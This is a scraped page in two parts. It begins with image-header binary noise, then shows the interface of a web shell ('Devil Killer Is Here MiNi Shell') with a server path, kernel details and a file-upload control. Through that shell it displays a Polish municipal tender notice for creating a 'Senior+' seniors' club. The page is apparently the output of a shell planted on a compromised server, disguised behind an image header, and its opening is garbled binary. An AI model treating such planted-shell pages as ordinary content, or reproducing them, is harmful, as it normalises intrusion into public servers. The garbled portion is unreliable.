JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240628/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240628/0038846901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utworzenie i wyposażenie Klubu &#34;Senior+&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MICHAŁÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291010317</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">115</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Michałów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">28-411</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">41 3565243</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">michalow@op.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.michalow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utworzenie i wyposażenie Klubu &#34;Senior+&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ec026582-353a-11ef-acf6-4e696a6d8c25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00388469</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00085336/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Utwarzenie i wyposażenie Klubu &#34;Senior+&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Zadanie dofinansowane programu wieloletniego &#34;Senior+&#34; na lata 2021-2025 </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ec026582-353a-11ef-acf6-4e696a6d8c25 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>dot. korespondencji elektronicznej zostały zawarte w pkt. IX SWZ - Informacje o środkach komunikacji elektronicznej, przy użyciu<br/>których Zamawiający będzie komunikował się z wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych<br/>osobowych - Załącznik nr 6 do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IKm.ZP 8.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie zadania pn.: Utworzenie i wyposażenie Klubu „Senior+”<br/>Zakres robót obejmuje wykonanie robót budowlanych polegającym na wykonaniu robót ogólnobudowlanych,<br/>wykończeniowych, instalacji elektrycznych i sanitarnych w budynku świetlicy w Górach wraz z zagospodarowaniem terenu<br/>działki. Po wykonaniu przedmiotowych prac powstanie klub seniora w skład, którego bada wchodzić następujące<br/>pomieszczenia. :<br/>• pomieszczenie ogólnodostępne,<br/>• pomieszczenie klubowe,<br/>• kuchnia,<br/>• szatnia,<br/>• toaleta damska i męska,<br/>Ponadto przy budynku zostanie wykonany podjazd dla niepełnosprawnych.<br/>2. Roboty budowlane stanowiące przedmiot niniejszego zamówienia zostały dokładnie określone w dokumentacji<br/>technicznej, która stanowi podstawę do realizacji robót, będących załącznikami do SWZ (projekcie budowlanym, specyfikacji<br/>technicznej wykonania i odbioru robót) stanowiącej załącznik nr 8 do SWZ<br/>Załączony do SWZ przedmiar ma jedynie charakter informacyjny. Wykonawca po zapoznaniu się z dokumentacją<br/>projektową i innymi dokumentami jest zobowiązany do ustalenia zakresu robót niezbędnych do osiągnięcia rezultatu.<br/>Prace towarzyszące konieczne do uwzględnienia, np.:<br/>a) organizacja i zabezpieczenie placu budowy,<br/>b) uporządkowanie terenu i przywrócenie go do stanu pierwotnego,<br/>c) zapewni bieżącą obsługę geodezyjną.<br/>Wykonawca zobowiązany jest do zapoznania się z przedmiotem zamówienia oraz do zawarcia w cenie oferty wszystkich<br/>niezbędnych kosztów do prawidłowego zrealizowania zamówienia, zgodnie z technologią robót określoną Polską Normą<br/>oraz Warunkami Technicznymi Odbioru Robót.<br/>Uwaga: Jeżeli dokumentacja projektowa lub specyfikacja techniczna wykonania i odbioru robót wskazywałyby w odniesieniu<br/>do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie, źródło lub szczególny proces, który<br/>charakteryzuje produkt lub usługi dostarczane przez konkretnego wykonawcę – Zamawiający, dopuszcza oferowanie<br/>materiałów lub urządzeń równoważnych. Materiały lub urządzenia pochodzące od konkretnych producentów stanowią<br/>wyłącznie wzorzec jakościowy przedmiotu zamówienia. Pod pojęciem „minimalne parametry jakościowe i cechy użytkowe”<br/>Zamawiający rozumie wymagania dotyczące materiałów lub urządzeń zawarte w ogólnie dostępnych źródłach, katalogach,<br/>stronach internetowych producentów. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie<br/>poziomu oczekiwań Zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami producentów/<br/>produktów ma wyłącznie charakter przykładowy. Zamawiający, wskazując oznaczenie konkretnego producenta (dostawcy)<br/>lub konkretny produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie produkty równoważne o parametrach<br/>jakościowych i cechach użytkowych co najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy<br/>produkt o wskazanych lub lepszych parametrach. Ciężar udowodnienia, że materiał (wyrób) jest równoważny w stosunku do<br/>wymogu określonego przez Zamawiającego spoczywa na składającym ofertę.<br/>Szczegółowy zakres robót precyzuje projekt– do wglądu w siedzibie Zamawiającego<br/>Minimalny wymagany termin gwarancji na cały przedmiot zamówienia wynosi 36 miesięcy, licząc od dnia końcowego<br/>odbioru robót. Przedłużenie okresu gwarancji jest kryterium oceny ofert. Wykonawca, któremu zostanie udzielone<br/>zamówienie udzieli zamawiającemu gwarancji zgodnie ze wzorem umowy.<br/>3. Kody zamówienia według Wspólnego Słownika Zamówień (CPV):<br/>45.21.00.00-2 - Roboty budowlane w zakresie budynków.<br/>3. Zamawiający nie dopuszcza składania ofert częściowych.<br/>4. Zamawiający nie dopuszcza możliwość składania ofert wariantowych.<br/>5.1. Zamawiający nie przewiduje udzielenie zamówienia, o którym mowa w 214 ust. 1 pkt. 8).<br/>5.2. Zamawiający przewiduje udzielenia zamówienia, o którym mowa w 214 ust. 1 pkt. 7 - do 20% zamówienia<br/>podstawowego.<br/>6. Zamawiający nie przewiduje aukcji elektronicznej.<br/>7. Zamawiający może zmniejszyć zakres prac objętych zamówieniem co spowoduje zmniejszenie wynagrodzenia<br/>ryczałtowego.<br/>8. Zamawiający nie dopuszcza składania ofert częściowych, o których mowa w art. 7 punkt 15 ustawy Pzp.<br/>Powody niedokonania podziału zamówienia na części:<br/>Na podstawie art. 91 ust. 2 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych dokonano szczegółowej<br/>analizy przedmiotu zamówienia oraz rozważono celowość podziału zamówienia na części. Zamawiający nie dopuszcza do<br/>składania ofert częściowych:<br/>Uzasadnienie braku podziału na części: Biorąc pod uwagę specyfikę zamówienia oraz zakres robót budowlanych<br/>Zamawiający stwierdził, iż podział zamówienia publicznego na części, dający możliwość wyboru różnych Wykonawców,<br/>mających równolegle zrealizować przedstawiony zakres zamówienia jest niezasadny. Potrzeba skoordynowania działań<br/>różnych Wykonawców realizujących poszczególne części zamówienia mogłaby poważnie zagrozić właściwemu wykonaniu<br/>zamówienia. Brak podziału nie ogranicza w żaden sposób zasady konkurencyjności, gdyż Zamawiający dopuszcza w<br/>ramach niniejszego zamówienia podwykonawstwo, ponadto Wykonawcy mogą także wspólnie ubiegać się o udzielenie<br/>zamówienia publicznego. Formuła ta zwiększa także efektywność i logistykę w zarządzaniu, pozwala również<br/>zoptymalizować koszty budowy. W związku z powyższym podział zamówienia na części nie jest uzasadniony, bowiem<br/>naraża to Zamawiającego na ryzyko.<br/>9. Wykonawca będzie ponosił pełną odpowiedzialność za wypadki i szkody powstałe w związku z nieprawidłowym<br/>oznakowaniem terenu budowy oraz wykonywaniem robót będących przedmiotem zamówienia.<br/>10. Wykonawca będzie ponosił odpowiedzialność za ochronę instalacji i urządzeń podziemnych, zapewni ich właściwe<br/>oznaczenie i zabezpieczenie przed uszkodzeniem w czasie trwania prac.<br/>11. Wykonawca będzie ponosił wszelkie koszty związane z odtworzeniem stanu pierwotnego.<br/>12. Wszystkie elementy z rozbiórki nadające się do ponownego użycia stanowią własność Zamawiającego, natomiast<br/>elementy uznane jako odpad, wykonawca powinien zutylizować we własnym zakresie i na własny koszt.<br/>13. Wykonawca zobowiązany jest do wykonania robót budowlanych zgodnie ze sztuką budowlaną, obowiązującymi<br/>przepisami i normami oraz przy zachowaniu przepisów BHP. Wykonawca gwarantuje także wykonanie przedmiotu<br/>zamówienia pod kierownictwem osób posiadających wymagane przygotowanie zawodowe do pełnienia samodzielnych<br/>funkcji technicznych w budownictwie.<br/>14. Wymagania w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95.<br/>Zamawiający wymaga zatrudnienia przez Wykonawcę lub podwykonawcę na podstawie stosunku pracy zgodnie z art. 22 §<br/>1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (Dz. U. z 2019r. poz. 1040, 1043 i 1495), osób realizujących przedmiot<br/>zamówienia, które wykonywać będą czynności fizyczne, związane z realizacją robót.<br/>14.1 Rodzaj czynności związanych z realizacją zamówienia, których dotyczą wymagania zatrudnienia na podstawie<br/>stosunku pracy:<br/>Powyższy obowiązek w szczególności dotyczy realizacji czynności związanych z wykonywaniem robót fizycznych,<br/>montażowych, instalacyjnych, operowania sprzętem oraz narzędziami, objętych zamówieniem wskazanych w przedmiarach<br/>robót, których wykonanie polega na wykonywaniu pracy w sposób określony art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. –<br/>Kodeks pracy, za wyjątkiem takich czynności jak kierowanie budową lub robotami, dostawy materiałów budowlanych.<br/>14.2. Sposób weryfikacji zatrudnienia tych osób:<br/>W trakcie realizacji zamówienia na każde wezwanie Zamawiającego Wykonawca przedłoży dowody potwierdzające<br/>spełnienie wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w ust. 14 pkt 14.1. czynności.<br/>14.3. Uprawnienia zamawiającego w zakresie kontroli spełniania przez wykonawcę wymagań związanych z zatrudnianiem<br/>tych osób oraz sankcji z tytułu niespełnienia tych wymagań są określone w projektowanych postanowieniach umowy<br/>(Załącznik nr 2 do SWZ).<br/>15. Mając na uwadze zakres wykonywanych robót Zamawiający uwzględnił w dokumentacji projektowej wymagania zawarte<br/>w art. 100 ustawy Pzp, tj. dotyczące dostępności wszystkich użytkowników, a w szczególności osób niepełnosprawnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający<br/>przewiduje udzielenia zamówienia, o którym mowa w 214 ust. 1 pkt. 7 - do 20% zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, o których mowa w art. 112 ust.1<br/>ustawy pzp i którzy wykażą ich spełnianie na poziomie wymaganym przez Zamawiającego zgodnie z opisem<br/>zamieszczonym poniżej.<br/>2. Wykonawcy zobowiązani będą spełnić warunki dotyczące:<br/>• sytuacji ekonomicznej lub finansowej<br/>Na potwierdzenie spełniania warunku Wykonawca ubiegający się o udzielenie zamówienia wykaże, że jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę<br/>gwarancyjną ubezpieczenia 100.000,00 PLN (słownie: sto tysięcy złotych).<br/>• zdolności technicznej lub zawodowej<br/>Na potwierdzenie spełniania warunku Wykonawca ubiegający się o udzielenie zamówienia wykaże, że:<br/>o wykonali nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie<br/>minimum 1 robotę polegającą na budowie lub przebudowie budynku użyteczności publicznej o wartości nie mniejszej niż<br/>100 000,00 PLN brutto (słownie: Sto tysięcy złotych);<br/>o dysponują osobami, które będą uczestniczyć w realizacji zamówienia w szczególności pełniącą funkcję:<br/>− Kierownika budowy - co najmniej 1 osoba posiadająca uprawnienia do kierowania robotami budowlanymi oraz informacją<br/>o podstawie do dysponowania tymi osobami do kierowania robotami budowlanymi bez ograniczeń w specjalności<br/>konstrukcyjno-budowlanej, zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity: Dz.U. z<br/>2024 r., poz. 725). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">4) Oświadczenia<br/>Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z<br/>dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną<br/>ofertę, ofertę częściową (o ile dotyczy), albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub<br/>informacjami potwierdzającymi przygotowanie oferty, oferty częściowej (o ile dotyczy) niezależnie od innego Wykonawcy należącego<br/>do tej samej grupy kapitałowej – wzór oświadczenia stanowi załącznik nr 11 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Po<br/>badaniu ofert pod kątem spełniania przesłanek odrzucenia oraz po wstępnej weryfikacji oświadczeń dotyczących spełniania<br/>warunków oraz braku podstaw do wykluczenia, Wykonawca, którego oferta zostanie najwyżej oceniona na wezwanie<br/>Zamawiającego zobowiązany będzie do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, aktualnych na<br/>dzień złożenia, następujących podmiotowych środków dowodowych:<br/>1) dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami - wzór stanowi zał. nr 9 do SWZ;<br/>3) wykaz robót budowlanych (min.1 robota) polegających na budowie lub przebudowie budynku użyteczności publicznej o wartości<br/>co najmniej 100 000,00 PLN brutto (słownie: sto tysięcy złotych) wykonanych nie wcześniej niż w okresie ostatnich 5 lat,<br/>a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania<br/>oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane<br/>zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot<br/>, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty - wzór wykazu stanowi załącznik nr 10 do SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawcę każdy z wykonawców<br/>składa:<br/>1. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania o udzielenie<br/>zamówienia - wzór oświadczenia stanowi Załącznik nr 3 do SWZ.<br/>2. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu o udzielenie<br/>zamówienia – wzór oświadczenia stanowi Załącznik nr 4 do SWZ.<br/>3. W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania, zamawiający żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru<br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego<br/>rejestru<br/>4. Jeżeli w imieniu Wykonawcy działa osoba, której umocowanie do jego reprezentowania nie<br/>wynika z dokumentów, o których mowa w pkt 3. -pełnomocnictwo lub inny dokument (np. akt powołania na 